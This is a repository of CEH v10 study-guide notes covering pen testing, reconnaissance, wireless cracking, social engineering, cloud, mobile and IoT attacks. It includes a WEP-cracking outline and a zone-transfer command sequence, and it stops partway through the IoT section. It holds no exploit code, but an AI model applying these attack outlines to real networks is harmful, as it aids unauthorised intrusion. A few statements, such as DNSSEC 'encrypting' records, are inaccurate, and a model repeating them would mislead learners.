├── _config.yml
├── Readme.md
├── 13 - The Pen Test - Putting It All Together.md
├── 9 - Security in Cloud Computing.md
├── 12 - Low Tech - Social Engineering and Physical Security.md
├── 2 - Reconnaissance.md
├── 7 - Wireless Network Hacking.md
├── 8 - Mobile Communications and IoT.md
├── 6 - Web-Based Hacking - Servers and Applications.md
├── 10 - Trojans and Other Attacks.md
├── LICENSE
├── 4 - Sniffing and Evasion.md
├── 11 - Cryptography 101.md
├── 5 - Attacking a System.md
├── 1 - Essential Knowledge.md
└── 3 - Scanning and Enumeration.md


/_config.yml:
--------------------------------------------------------------------------------
1 | theme: jekyll-theme-cayman


--------------------------------------------------------------------------------
/Readme.md:
--------------------------------------------------------------------------------
 1 | # CEH v10 Study Guide
 2 | 
 3 | Created based off information found in [CEH Certified Ethical Hacker All-in-One Exam Guide, Fourth Edition](https://www.amazon.com/gp/product/126045455X/ref=ppx_yo_dt_b_asin_title_o02_s00?ie=UTF8&psc=1) by Matt Walker
 4 | 
 5 | ## Table of Contents
 6 | 
 7 | [1 - Essential Knowledge](1 - Essential Knowledge.md)
 8 | 
 9 | [2 - Reconnaissance](2 - Reconnaissance.md)
10 | 
11 | [3 - Scanning and Enumeration](3 - Scanning and Enumeration.md)
12 | 
13 | [4 - Sniffing and Evasion](4 - Sniffing and Evasion.md)
14 | 
15 | [5 - Attacking a System](5 - Attacking a System.md)
16 | 
17 | [6 - Web-Based Hacking - Servers and Applications](6 - Web-Based Hacking - Servers and Applications.md)
18 | 
19 | [7 - Wireless Network Hacking](7 - Wireless Network Hacking.md)
20 | 
21 | [8 - Mobile Communications and IoT](8 - Mobile Communications and IoT.md)
22 | 
23 | [9 - Security in Cloud Computing](9 - Security in Cloud Computing.md)
24 | 
25 | [10 - Trojans and Other Attacks](10 - Trojans and Other Attacks.md)
26 | 
27 | [11 - Cryptography 101](11 - Cryptography 101.md)
28 | 
29 | [12 - Low Tech - Social Engineering and Physical Security](12 - Low Tech - Social Engineering and Physical Security.md)
30 | 
31 | [13 - The Pen Test - Putting It All Together](13 - The Pen Test - Putting It All Together.md)
32 | 


--------------------------------------------------------------------------------
/13 - The Pen Test - Putting It All Together.md:
--------------------------------------------------------------------------------
 1 | # The Pen Test:  Putting It All Together
 2 | 
 3 | - **Security Assessment** - test performed in order to assess the level of security on a network or system
 4 | - **Security Audit** - policy and procedure focused; tests whether organization is following specific standards and policies
 5 | - **Vulnerability Assessment** - scans and tests for vulnerabilities but does not intentionally exploit them
 6 | - **Penetration Test** - looks for vulnerabilities and actively seeks to exploit them
 7 | - Need to make sure you have a great contract in place to protect you from liability
 8 | - **Types of Pen Tests**
 9 |   - **External assessment** - analyzes publicly available information; conducts network scanning, enumeration and testing from the network perimeter
10 |   - **Internal Assessment** - performed from within the organization, from various network access points
11 | - **Red Team** - pen test team that is doing the attacking
12 | - **Blue Team** - pen test team that is doing the defending
13 | - **Purple Team** - pen test team that is doing both attacking and defending
14 | - **Automated Testing Tools**
15 |   - **Codenomicon** - utilizes fuzz testing that learns the tested system automatically; allows for pen testers to enter new domains such as VoIP assessment, etc.
16 |   - **Core Impact Pro** - best known, all-inclusive automated testing framework; tests everything from web applications and individual systems to network devices and wireless
17 |   - **Metasploit** - framework for developing and executing code against a remote target machine
18 |   - **CANVAS** - hundreds of exploits, automated exploitation system and extensive exploit development framework
19 | - **Phases of Pen Test**
20 |   - **Pre-Attack Phase** - reconnaissance and data-gathering
21 |   - **Attack Phase** - attempts to penetrate the network and execute attacks
22 |   - **Post-Attack Phase** - Cleanup to return a system to the pre-attack condition and deliver reports
23 | 
24 | ### <u>Security Assessment Deliverables</u>
25 | 
26 | - Usually begins with a brief to management
27 |   - Provides information about your team and the overview of the original agreement
28 |   - Explain what tests were done and the results of them
29 | - **Comprehensive Report Parts**
30 |   - Executive summary of the organization's security posture
31 |   - Names of all participants and dates of tests
32 |   - List of all findings, presented in order of risk
33 |   - Analysis of each finding and recommended mitigation steps
34 |   - Log files and other evidence (screenshots, etc.)
35 | - Example reports and methodology can be found in the **Open Source Testing Methodology Manual** (OSSTMM)
36 | 
37 | ### <u>Terminology</u>
38 | 
39 | - **Types of Insiders**
40 |   - **Pure Insider** - employee with all rights and access associated with being an employee
41 |     - **Elevated Pure Insider** - employee who has admin privileges
42 |   - **Insider Associate** - someone with limited authorized access such as a contractor, guard or cleaning service person
43 |   - **Insider Affiliate** - spouse, friend or client of an employee who uses the employee's credentials to gain access
44 |   - **Outside Affiliate** - someone outside the organization who uses an open access channel to gain access to an organization's resources
45 | 


--------------------------------------------------------------------------------
/9 - Security in Cloud Computing.md:
--------------------------------------------------------------------------------
 1 | # Security in Cloud Computing
 2 | 
 3 | ### <u>Cloud Computing Basics</u>
 4 | 
 5 | - **Three Types**
 6 |   - **Infrastructure as a Service** (IaaS)
 7 |     - Provides virtualized computing resources
 8 |     - Third party hosts the servers with hypervisor running the VMs as guests
 9 |     - Subscribers usually pay on a per-use basis
10 |   - **Platform as a Service** (Paas)
11 |     - Geared towards software development
12 |     - Hardware and software hosted by provider
13 |     - Provides ability to develop without having to worry about hardware or software
14 |   - **Software as a Service** (SaaS)
15 |     - Provider supplies on-demand applications to subscribers
16 |     - Offloads the need for patch management, compatability and version control
17 | - **Deployment Models**
18 |   - **Public Cloud** - services provided over a network that is open for public to use
19 |   - **Private Cloud** - cloud solely for use by one tenant; usually done in larger organizations
20 |   - **Community Cloud** - cloud shared by several organizations, but not open to public
21 |   - **Hybrid Cloud** - a composition of two or more cloud deployment models
22 | - **NIST Cloud Architecture**
23 |   - **Cloud Carrier** - organization with responsibility of transferring data; akin to power distributor for electric grid
24 |   - **Cloud Consumer** - aquires and uses cloud products and services
25 |   - **Cloud Provider** - purveyor of products and services
26 |   - **Cloud Broker** - manages use, performance and delivery of services as well as relationships betwen providers and subscribers
27 |   - **Cloud Auditor** - independent assor of cloud service an security controls
28 | - **FedRAMP** - regulatory effort regarding cloud computing
29 | - **PCI DSS** - deals with debit and credit cards, but also has a cloud SIG
30 | 
31 | ### <u>Cloud Security</u>
32 | 
33 | - Problem with cloud security is what you are allowed to test and what should you test
34 | - Another concern is with a hypervisor, if the hypervisor is compromised, all hosts on that hypervisor are as well
35 | - **Trusted Computing Model** - attempts to resolve computer security problems through hardware enhancements
36 |   - **Roots of Trust** (RoT) - set of functions within TCM that are always trusted by the OS
37 | - **Tools**
38 |   - **CloudInspect** - pen-testing application for AWS EC2 users
39 |   - **CloudPassage Halo** - instant visibility and continuous protection for servers in any cloud
40 |   - **Dell Cloud Manager**
41 |   - **Qualys Cloud Suite**
42 |   - **Trend Micro's Instant-On Cloud Security**
43 |   - **Panda Cloud Office Protection**
44 | 
45 | ### <u>Threats and Attacks</u>
46 | 
47 | - **Data Breach or Loss** - biggest threat; includes malicious theft, erasure or modification
48 | - **Shadow IT** - IT systems or solutions that are developed to handle an issue but aren't taken through proper approval chain
49 | - **Abuse of Cloud Resources** -  another high threat (usually applies to Iaas and PaaS)
50 | - **Insecure Interfaces and APIs** - cloud services can't function without them, but need to make sure they are secure
51 | - **Service Oriented Architecture** - API that makes it easier for application components to cooperate and exchange information
52 | - Insufficient due diligence - moving an application without knowing the security differences
53 | - Shared technology issues - multitenant environments that don't provide proper isolation
54 | - Unknown risk profiles - subscribers simply don't know what security provisions are made int he background
55 | - Others include malicious insiders, inadequate design and DDoS
56 | - **Wrapping Attack** - SOAP message intercepted and data in envelope is changed and sent/replayed
57 | - **Session riding** - CSRF under a different name; deals with cloud services instead of traditional data centers
58 | - **Side Channel Attack** - using an existing VM on the same physical host to attack another
59 |   - This is more broadly defined as using something other than the direct interface to attack a system
60 | 


--------------------------------------------------------------------------------
/12 - Low Tech - Social Engineering and Physical Security.md:
--------------------------------------------------------------------------------
 1 | # Low Tech: Social Engineering and Physical Security
 2 | 
 3 | ### <u>Social Engineering</u>
 4 | 
 5 | - The art of manipulating a person or group into providing information or a service they would otherwise not have given
 6 | - **Phases**
 7 |   1. Research (dumpster dive, visit websites, tour the company, etc.)
 8 |   2. Select the victim (identify frustrated employee or other target)
 9 |   3. Develop a relationship
10 |   4. Exploit the relationship (collect sensitive information)
11 | - **Reasons This Works**
12 |   - Human nature (trusting others)
13 |   - Ignorance of social engineering efforts
14 |   - Fear (of consequences of not providing the information)
15 |   - Greed (promised gain for providing requested information)
16 |   - A sense of moral obligation
17 | 
18 | ### <u>Human-Based Attacks</u>
19 | 
20 | - **Dumpster Diving** - looking for sensitive information in the trash
21 |   - Shredded papers can sometimes indicate sensitive info
22 | - **Impersonation** - pretending to be someone you're not
23 |   - Can be anything from a help desk person up to an authoritative figure (FBI agent)
24 |   - Posing as a tech support professional can really quickly gain trust with a person
25 | - **Shoulder Surfing** - looking over someone's shoulder to get info
26 |   - Can be done long distance with binoculars, etc.
27 | - **Eavesdropping** - listening in on conversations about sensitive information
28 | - **Tailgating** - attacker has a fake badge and walks in behind someone who has a valid one
29 | - **Piggybacking** - attacker pretends they lost their badge and asks someone to hold the door
30 | - **RFID Identity Theft** (RFID skimming) - stealing an RFID card signature with a specialized device
31 | - **Reverse Social Engineering** - getting someone to call you and give information
32 |   - Often happens with tech support - an email is sent to user stating they need them to call back (due to technical issue) and the user calls back
33 |   - Can also be combined with a DoS attack to cause a problem that the user would need to call about
34 | - Always be pleasant - it gets more information
35 | - **Rebecca** or **Jessica** - targets for social engineering
36 | - **Insider Attack** - an attack from an employee, generally disgruntled
37 |   - Sometimes subclassified (negligent insider, professional insider)
38 | 
39 | ### <u>Computer-Based Attacks</u>
40 | 
41 | - Can begin with sites like Facebook where information about a person is available
42 | - For instance - if you know Bob is working on a project, an email crafted to him about that project would seem quite normal if you spoof it from a person on his project
43 | - **Phishing** - crafting an email that appears legitimate but contains links to fake websites or to download malicious content
44 | - **Ways to Avoid Phishing**
45 |   - Beware unknown, unexpected or suspicious originators
46 |   - Beware of who the email is addressed to
47 |   - Verify phone numbers
48 |   - Beware bad spelling or grammar
49 |   - Always check links
50 | - **Spear Phishing** - targeting a person or a group with a phishing attack
51 |   - Can be more useful because attack can be targeted
52 | - **Whaling** - going after CEOs or other C-level executives
53 | - **Pharming** - use of malicious code that redirects a user's traffic
54 | - **Spimming** - sending spam over instant message
55 | - **Tools** - Netcraft Toolbar and PhishTank Toolbar
56 | - **Fave Antivirus** - very prevalent attack; pretends to be an anti-virus but is a malicious tool
57 | 
58 | ### <u>Mobile-Based Attacks</u>
59 | 
60 | - **ZitMo** (ZeuS-in-the-Mobile) - banking malware that was ported to Android
61 | - SMS messages can be sent to request premium services
62 | - **Attacks**
63 |   - Publishing malicious apps
64 |   - Repackaging legitimate apps
65 |   - Fake security applications
66 |   - SMS (**smishing**)
67 | 
68 | ### <u>Physical Security Basics</u>
69 | 
70 | - **Physical measures** - everything you can touch, taste, smell or get shocked by
71 |   - Includes things like air quality, power concerns, humidity-control systems
72 | - **Technical measures** - smartcards and biometrics
73 | - **Operational measures** - policies and procedures you set up to enforce a security-minded operation
74 | - **Access controls** - physical measures designed to prevent access to controlled areas
75 |   - **Biometrics** - measures taken for authentication that come from the "something you are" concept
76 |     - **False rejection rate** (FRR) - when a biometric rejects a valid user
77 |     - **False acceptance rate** (FAR) - when a biometric accepts an invalid user
78 |     - **Crossover error rate** (CER) - combination of the two; determines how good a system is
79 | - Even though hackers normally don't worry about environmental disasters, this is something to think of from a pen test standpoint (hurricanes, tornadoes, floods, etc.)
80 | 


--------------------------------------------------------------------------------
/2 - Reconnaissance.md:
--------------------------------------------------------------------------------
  1 | # Reconnaissance
  2 | 
  3 | ### <u>Footprinting</u>
  4 | 
  5 | - Looking for high-level information on a target
  6 | - Types
  7 |   - **Anonymous** - information gathering without revealing anything about yourself
  8 |   - **Pseudonymous** - making someone else take the blame for your actions
  9 | 
 10 | ### <u>Four Main Focuses</u>
 11 | 
 12 | - Know the security posture
 13 | - Reduce the focus area
 14 | - Identify vulnerabilities
 15 | - Draw a network map
 16 | 
 17 | ### <u>Types of Footprinting</u>
 18 | 
 19 | - **Active** - requires attacker to touch the device or network
 20 |   - Social engineering and other communication that requires interaction with target
 21 | - **Passive** - measures to collect information from publicly available sources
 22 |   - Websites, DNS records, business information databases
 23 | 
 24 | **Competitive Intelligence** - information gathered by businesses about competitors
 25 | 
 26 | **Alexa.com** - resource for statistics about websites
 27 | 
 28 | ### <u>Methods and Tools</u>
 29 | 
 30 | **Search Engines**
 31 | 
 32 | - **NetCraft** - information about website and possibly OS info
 33 | - **Job Search Sites** - information about technologies can be gleaned from job postings
 34 | - **Google**
 35 |   - filetype:  - looks for file types
 36 |   - index of - directory listings
 37 |   - info: - contains Google's information about the page
 38 |   - intitle: - string in title
 39 |   - inurl: - string in url
 40 |   - link: - finds linked pages
 41 |   - related: - finds similar pages
 42 |   - site: - finds pages specific to that site
 43 | - **Metagoofil** - uses Google hacks to find information in meta tags
 44 | 
 45 | **Website Footprinting**
 46 | 
 47 | - **Web mirroring** - allows for discrete testing offline
 48 |   - HTTrack
 49 |   - Black Widow
 50 |   - Wget
 51 |   - WebRipper
 52 |   - Teleport Pro
 53 |   - Backstreet Browser
 54 | - **Archive.org** - provides cached websites from various dates which possibly have sensitive information that has been now removed
 55 | 
 56 | **Email Footprinting**
 57 | 
 58 | - **Email  header** - may show servers and where the location of those servers are
 59 | - **Email tracking** - services can track various bits of information including the IP address of where it was opened, where it went, etc.
 60 | 
 61 | **DNS Footprinting**
 62 | 
 63 | - Ports
 64 | 
 65 |   - Name lookup - UDP 53
 66 |   - Zone transfer - TCP 53
 67 | 
 68 | - Zone transfer replicates all records
 69 | 
 70 | - **Name resolvers** answer requests
 71 | 
 72 | - **Authoritative Servers** hold all records for a namespace
 73 | 
 74 | - **DNS Record Types**
 75 | 
 76 |   
 77 | 
 78 |   - | Name  | Description        | Purpose                                        |
 79 |     | ----- | ------------------ | ---------------------------------------------- |
 80 |     | SRV   | Service            | Points to a specific service                   |
 81 |     | SOA   | Start of Authority | Indicates the authoritative NS for a namespace |
 82 |     | PTR   | Pointer            | Maps an IP to a hostname                       |
 83 |     | NS    | Nameserver         | Lists the nameservers for a namespace          |
 84 |     | MX    | Mail Exchange      | Lists email servers                            |
 85 |     | CNAME | Canonical Name     | Maps a name to an A reccord                    |
 86 |     | A     | Address            | Maps an hostname to an IP address              |
 87 | 
 88 | - **DNS Poisoning** - changes cache on a machine to redirect requests to a malicious server
 89 | 
 90 | - **DNSSEC** - helps prevent DNS poisoning by encrypting records
 91 | 
 92 | - **SOA Record Fields**
 93 | 
 94 |   - **Source Host** - hostname of the primary DNS
 95 |   - **Contact Email** - email for the person responsible for the zone file
 96 |   - **Serial Number** - revision number that increments with each change
 97 |   - **Refresh Time** - time in which an update should occur
 98 |   - **Retry Time** - time that a NS should wait on a failure
 99 |   - **Expire Time** - time in which a zone transfer is allowed to complete
100 |   - **TTL** - minimum TTL for records within the zone
101 | 
102 | - **IP Address Management**
103 | 
104 |   - **ARIN** - North America
105 |   - **APNIC** - Asia Pacific
106 |   - **RIPE** - Europe, Middle East
107 |   - **LACNIC** - Latin America
108 |   - **AfriNIC** - Africa
109 | 
110 | - **Whois** - obtains registration information for the domain
111 | 
112 | - **Nslookup** - performs DNS queries
113 | 
114 |   - nslookup [ - options ] [ hostname ]
115 |   - interactive zone transfer
116 |     - nslookup
117 |     - server <IP Address>
118 |     - set type = any
119 |     - ls -d domainname.com
120 | 
121 | - **Dig** - unix-based command like nslookup
122 | 
123 |   - dig @server name type
124 | 
125 | **Network Footprinting**
126 | 
127 | - IP address range can be obtained from regional registrar (ARIN here)
128 | - Use traceroute to find intermediary servers
129 |   - traceroute uses ICMP echo in Windows
130 | - Windows command - tracert
131 | - Linux Command - traceroute
132 | 
133 | **Other Tools**
134 | 
135 | - **OSRFramework** - uses open source intelligence to get information about target
136 | - **Web Spiders** - obtain information from the website such as pages, etc.
137 | - **Social Engineering Tools**
138 |   - Maltego
139 |   - Social Engineering Framework (SEF)
140 | - **Shodan** - search engine that shows devices connected to the Internet
141 | 
142 | **Computer Security Incident Response Team** (CSIRT) - point of contact for all incident response services for associates of the DHS
143 | 


--------------------------------------------------------------------------------
/7 - Wireless Network Hacking.md:
--------------------------------------------------------------------------------
  1 | # Wireless Network Hacking
  2 | 
  3 | ### <u>Wireless Basics</u>
  4 | 
  5 | - **802.11 Series** - defines the standards for wireless networks
  6 | - **802.15.1** - Bluetooth
  7 | - **802.15.4** - Zigbee - low power, low data rate, close proximity ad-hoc networks
  8 | - **802.16** - WiMAX - broadband wireless metropolitan area networks
  9 | 
 10 | | Wireless Standard | Operating Speed (Mbps) | Frequency (GHz) | Modulation Type |
 11 | |-------------------|------------------------|-----------------|-----------------|
 12 | | 802.11a           | 54                     | 5               | OFDM            |
 13 | | 802.11b           | 11                     | 2.4             | DSSS            |
 14 | | 802.11d           | Variation of a & b     | Global use      |                 |
 15 | | 802.11e           | QoS Initiative         | Data and voice  |                 |
 16 | | 802.11g           | 54                     | 2.4             | OFDM and DSSS   |
 17 | | 802.11i           | WPA/WPA2 Encryption    |                 |                 |
 18 | | 802.11n           | 100+                   | 2.4-5           | OFDM            |
 19 | | 802.11ac          | 1000                   | 5               | QAM             |
 20 | 
 21 | - **Orthogonal Frequency-Division Multiplexing** (OFDM) - carries waves in various channels
 22 | - **Direct-Sequence Spread Spectrum** (DSSS) - combines all available waveforms into a single purpose
 23 | - **Basic Service Set** (BSS) - communication between a single AP and its clients
 24 | - **Basic Service Set Identifier** (BSSID) - MAC address of the wireless access point
 25 | - **Spectrum Analyzer** - verifies wireless quality, detects rogue access points and detects attacks
 26 | - **Directional antenna** - signals in one direction; Yagi antenna is a type
 27 | - **Omnidirectional antenna** - signals in all directions
 28 | - **Service Set Identifier** (SSID) - a text word (<= 32 char) that identifies network; provides no security
 29 | - **Three Types of Authentication**
 30 |   - **Open System** - no authentication
 31 |   - **Shared Key Authentication** - authentication through a shared key (password)
 32 |   - **Centralized Authentication** - authentication through something like RADIUS
 33 | - **Association** is the act of connecting; **authentication** is the act of identifying the client
 34 | 
 35 | ### <u>Wireless Encryption</u>
 36 | 
 37 | - **Wired Equivalent Privacy** (WEP)
 38 |   - Doesn't effectively encrypt anything
 39 |   - Uses RC4 for encryption
 40 |   - Original intent was to give wireless the same level of protection of an Ethernet hub
 41 |   - **Initialization Vector** (IV) - used to calculate a 32-bit integrity check value (ICV)
 42 |   	- IVs are generally small and are frequently reused
 43 |   	- Sent in clear text as a part of the header
 44 |   	- This combined with RC4 makes it easy to decrypt the WEP key
 45 |   	- An attacker can send disassociate requests to the AP to generate a lot of these
 46 | - **Wi-Fi Protected Access** (WPA or WPA2)
 47 |   - WPA uses TKIP with a 128-bit key
 48 |   - WPA changes the key every 10,000 packets
 49 |   - WPA transfers keys back and forth during an **Extensible Authentication Protocol** (EAP)
 50 |   - **WPA2 Enterprise** - can tie an EAP or RADIUS server into the authentication
 51 |   - **WPA2 Personal** - uses a pre-shared key to authenticate
 52 |   - WPA2 uses AES for encryption
 53 |   - WPA2 ensures FIPS 140-2 compliance
 54 |   - WPA2 uses CCMP instead of TKIP
 55 |   - **Message Integrity Codes** (MIC) - hashes for CCMP to protect integrity
 56 |   - **Cipher Block Chaining Message Authentication Code** (CBC-MAC) - integrity process of WPA2
 57 | 
 58 | | Wireless Standard | Encryption | IV Size (Bits) | Key Length (Bits) | Integrity Check |
 59 | |-------------------|------------|----------------|-------------------|-----------------|
 60 | | WEP               | RC4        | 24             | 40/104            | CRC-32          |
 61 | | WPA               | RC4 + TKIP | 48             | 128               | Michael/CRC-32  |
 62 | | WPA2              | AES-CCMP   | 48             | 128               | CBC-MAC (CCMP)  |
 63 | 
 64 | ### <u>Wireless Hacking</u>
 65 | 
 66 | - **Threats**
 67 |   - Access Control Attacks
 68 |   - Integrity Attacks
 69 |   - Confidentiality Attacks
 70 |   - Availability Attacks
 71 |   - Authentication Attacks
 72 | - **Network Discovery**
 73 |   - Wardriving, warflying, warwalking, etc.
 74 |   - Tools such as WiFiExplorer, WiFiFoFum, OpenSignalMaps, WiFinder
 75 |   - **WIGLE** - map for wireless networks
 76 |   - **NetStumbler** - tool to find networks
 77 |   - **Kismet** - wireless packet analyzer/sniffer that can be used for discovery
 78 |   	- Works without sending any packets (passively)
 79 |   	- Can detects access points that have not been configured
 80 |   	- Works by channel hopping
 81 |   	- Can discover networks not sending beacon frames
 82 |   	- Ability to sniff packets and save them to  a log file (readable by Wireshark/tcpdump)
 83 |   - **NetSurveyor** - tool for Windows that does similar features to NetStumbler and Kismet
 84 |   	- Doesn't require special drivers
 85 | - **WiFi Adapter**
 86 |   - AirPcap is mentioned for Windows, but isn't made anymore
 87 |   - **pcap** - driver library for Windows
 88 |   - **libpcap** - driver library for Linux
 89 | 
 90 | ### <u>Wireless Attacks</u>
 91 | 
 92 | - **Rogue Access Point** - places an access point controlled by an attacker
 93 | - **Evil Twin** - a rogue AP with a SSID similar to the name of a popular network
 94 |   - Also known as a mis-association attack
 95 | - **Honeyspot** - faking a well-known hotspot with a rogue AP
 96 | - **Ad Hoc Connection Attack** - connecting directly to another phone via ad-hoc network
 97 |   - Not very successful as the other user has to accept connection
 98 | - **DoS Attack** - either sends de-auth packets to the AP or jam the wireless signal
 99 |   - With a de-auth, you can have the users connect to your AP instead if it has the same name
100 |   - Jammers are very dangerous as they are illegal
101 | - **MAC Filter** - only allows certain MAC addresses on a network
102 |   - Easily broken because you can sniff out MAC addresses already connected and spoof it
103 |   - Tools for spoofing include **SMAC** and **TMAC**
104 | 
105 | ### <u>Wireless Encryption Attacks</u>
106 | 
107 | - **WEP Cracking**
108 |   - Easy to do because of weak IVs
109 |   - **Process**
110 |     1. Start a compatible adapter with injection and sniffing capabilities
111 |     2. Start a sniffer to capture packets
112 |     3. Force the creation of thousands of packets (generally with de-auth)
113 |     4. Analyze captured packets
114 |   - **Tools**
115 |   	- **Aircrack-ng** - sniffer, detector, traffic analysis tool and a password cracker
116 |   	  - Uses dictionary attacks for WPA and WPA 2.  Other attacks are for WEP only
117 | 	- **Cain and Abel** - sniffs packets and cracks passwords (may take longer)
118 |       - Relies on statistical measures and the PTW technique to break WEP
119 | 	- **KisMAC** - MacOS tool to brute force WEP or WPA passwords
120 | 	- **WEPAttack**
121 | 	- **WEPCrack**
122 | 	- **Portable Penetrator**
123 | 	- **Elcomsoft's Wireless Security Auditor**
124 |   - Methods to crack include **PTW**, **FMS**, and **Korek** technique
125 | - **WPA Cracking**
126 |   - Much more difficult than WEP
127 |   - Uses a constantly changing temporal key and user-defined password
128 |   - **Key Reinstallation Attack** (KRACK) - replay attack that uses third handshake of another device's session
129 |   - Most other attacks are simply brute-forcing the password
130 | 
131 | ### <u>Wireless Sniffing</u>
132 | 
133 | - Very similar to sniffing a wired network
134 | - **Tools**
135 |   - **NetStumbler**
136 |   - **Kismet**
137 |   - **OmniPeek** - provides data like Wireshark in addition to network activity and monitoring
138 |   - **AirMagnet WiFi Analyzer Pro** - sniffer, traffic analyzer and network-auditing suite
139 |   - **WiFi Pilot**
140 | 


--------------------------------------------------------------------------------
/8 - Mobile Communications and IoT.md:
--------------------------------------------------------------------------------
  1 | # Mobile Communications and IoT
  2 | 
  3 | ### <u>Mobile Platform Hacking</u>
  4 | 
  5 | - **Three Main Avenues of Attack**
  6 |   - **Device Attacks** - browser based, SMS, application attacks, rooted/jailbroken devices
  7 |   - **Network Attacks** - DNS cache poisoning, rogue APs, packet sniffing
  8 |   - **Data Center (Cloud) Attacks** - databases, photos, etc.
  9 | 
 10 | - **OWASP Top 10 Mobile Risks**
 11 |   - **M1 - Improper Platform Usage** - misuse of features or security controls (Android intents, TouchID, Keychain)
 12 |   - **M2 - Insecure Data Storage** - improperly stored data and data leakage
 13 |   - **M3 - Insecure Communication** - poor handshaking, incorrect SSL, clear-text communication
 14 |   - **M4 - Insecure Authentication** - authenticating end user or bad session management
 15 |   - **M5 - Insufficient Cryptography** - code that applies cryptography to an asset, but is insufficient (does NOT include SSL/TLS)
 16 |   - **M6 - Insecure Authorization** - failures in authorization (access rights)
 17 |   - **M7 - Client Code Quality** - catchall for code-level implementation problems
 18 |   - **M8 - Code Tampering** - binary patching, resource modification, dynamic memory modification
 19 |   - **M9 - Reverse Engineering** - reversing core binaries to find problems and exploits
 20 |   - **M10 - Extraneous Functionality** - catchall for backdoors that were inadvertently placed by coders
 21 | 
 22 | ### <u>Mobile Platforms</u>
 23 | 
 24 | - **Android** - platform built by Google
 25 |   - **Rooting** - name given to the ability to have root access on an Android device
 26 |     - **Tools**
 27 |       - KingoRoot
 28 |       - TunesGo
 29 |       - OneClickRoot
 30 |       - MTK Droid
 31 | - **iOS** - platform built by Apple
 32 |   - **Jailbreaking** - different levels of rooting an iOS device
 33 |     - **Tools**
 34 |       - evasi0n7
 35 |       - GeekSn0w
 36 |       - Pangu
 37 |       - Redsn0w
 38 |       - Absinthe
 39 |       - Cydia
 40 |     - **Techniques**
 41 |       - **Untethered** - kernel remains patched after reboot, with or without a system connection
 42 |       - **Semi-Tethered** - reboot no longer retains patch; must use installed jailbreak software to re-jailbreak
 43 |       - **Tethered** - reboot removes all jailbreaking patches; phone may get in boot loop requiring USB to repair
 44 |     - **Types**
 45 |       - **Userland exploit** - found in the system itself; gains root access; does not provide admin; can be patched by Apple
 46 |       - **iBoot exploit** - found in bootloader called iBoot; uses vulnerability to turn codesign off; semi-tethered; can be patched
 47 |       - **BootROM exploit** - allows access to file system, iBoot and custom boot logos; found in device's first bootloader; cannot be patched
 48 | - **App Store attacks** - since some App stores are not vetted, malicious apps can be placed there
 49 | - **Phishing attacks** - mobile phones have more data to be stolen and are just as vulnerable as desktops
 50 | - **Android Device Administration API** - allows for security-aware apps that may help
 51 | - **Bring Your Own Device** (BYOD) - dangerous for organizations because not all phones can be locked down by default
 52 | - **Mobile Device Management** - like group policy on Windows; helps enforce security and deploy apps from enterprise
 53 |   - MDM solutions include XenMobile, IBM, MaaS360, AirWatch and MobiControl
 54 | - **Bluetooth attacks** - if a mobile device can be connected to easily, it can fall prey to Bluetooth attacks
 55 |   - **Discovery mode** - how the device reacts to inquiries from other devices
 56 |     - **Discoverable** - answers all inquiries
 57 |     - **Limited Discoverable** - restricts the action
 58 |     - **Nondiscoverable** - ignores all inquiries
 59 |   - **Pairing mode** - how the device deals with pairing requests
 60 |     - **Pairable** - accepts all requests
 61 |     - **Nonpairable** - rejects all connection requests
 62 | 
 63 | ### <u>Mobile Attacks</u>
 64 | 
 65 | - **SMS Phishing** - sending texts with malicious links
 66 |   - People tend to trust these more because they happen less
 67 |   - **Trojans Available to Send**
 68 |     - Obad
 69 |     - Fakedefender
 70 |     - TRAMPS
 71 |     - ZitMo
 72 |   - **Spyware**
 73 |     - Mobile Spy
 74 |     - Spyera
 75 | - Mobile platform features such as Find my iPhone, Android device tracking and the like can be hacked to find devices, etc.
 76 | - **Mobile Attack Platforms** - tools that allow you to attack from your phone
 77 |   - Network Spoofer
 78 |   - DroidSheep
 79 |   - Nmap
 80 | - **Bluetooth Attacks**
 81 |   - **Bluesmacking** - denial of service against device
 82 |   - **Bluejacking** - sending unsolicited messages
 83 |   - **Bluesniffing** - attempt to discover Bluetooth devices
 84 |   - **Bluebugging** - remotely using a device's features
 85 |   - **Bluesnarfing** - theft of data from a device
 86 |   - **Blueprinting** - collecting device information over Bluetooth
 87 | - **Bluetooth Attack Tools**
 88 |   - **BlueScanner** - finds devices around you
 89 |   - **BT Browser** - another tool for finding and enumerating devices
 90 |   - **Bluesniff** and **btCrawler** - sniffing programs with GUI
 91 |   - **Bloover** - can perform Bluebugging
 92 |   - **PhoneSnoop** - good spyware option for Blackberry
 93 |   - **Super Bluetooth Hack** - all-in-one package that allows you to do almost anything
 94 | 
 95 | ### <u>IoT Architecture</u>
 96 | 
 97 | - **Definition** - a collection of devices using sensors, software, storage and electronics to collect, analyze, store and share data
 98 | - **Three Basic Components**
 99 |   - Sensing Technology
100 |   - IoT gateways
101 |   - The cloud
102 | - **Operating Systems**
103 |   - **RIOT OS** - embedded systems, actuator boards, sensors; is energy efficient
104 |   - **ARM Mbed OS** - mostly used on wearables and other low-powered devices
105 |   - **RealSense OS X** - Intel's depth sensing version; mostly found in cameras and other sensors
106 |   - **Nucleus RTOS** - used in aerospace, medical and industrial applications
107 |   - **Brillo** - Android-based OS; generally found in thermostats
108 |   - **Contiki** - OS made for low-power devices; found mostly in street lighting and sound monitoring
109 |   - **Zephyr** - option for low-power devices and devices without many resources
110 |   - **Ubuntu Core** - used in robots and drones; known as "snappy"
111 |   - **Integrity RTOS** - found in aerospace, medical, defense, industrial and automotive sensors
112 |   - **Apache Mynewt** - used in devices using Bluetooth Low Energy Protocol
113 | - **Methods of Communicating**
114 |   - **Device to Device** - communicates directly with other IoT devices
115 |   - **Device to Cloud** - communicates directly to a cloud service
116 |   - **Device to Gateway** - communicates with a gateway before sending to the cloud
117 |   - **Back-End Data Sharing** - like device to cloud but adds abilities for parties to collect and use the data
118 | - **Architecture Levels**
119 |   - **Edge Technology Layer** - consists of sensors, RFID tags, readers and the devices
120 |   - **Access Gateway Layer** - first data handling, message identification and routing
121 |   - **Internet Layer** - crucial layer which serves as main component to allow communication
122 |   - **Middleware Layer** - sits between application and hardware; handles data and device management, data analysis and aggregation
123 |   - **Application Layer** - responsible for delivery of services and data to the user
124 | 
125 | ### <u>IoT Vulnerabilities and Attacks</u>
126 | 
127 | - **I1 - Insecure Web Interface** - problems such as account enumeration, weak credentials, and no account lockout
128 | - **I2 - Insufficient Authentication/Authorization** - assumes interfaces will only be exposed on internal networks and thus is a flaw
129 | - **I3 - Insecure Network Services** - may be susceptible to buffer overflow or DoS attacks
130 | - **I4 - Lack of Transport Encryption/Integrity Verification** - data transported without encryption
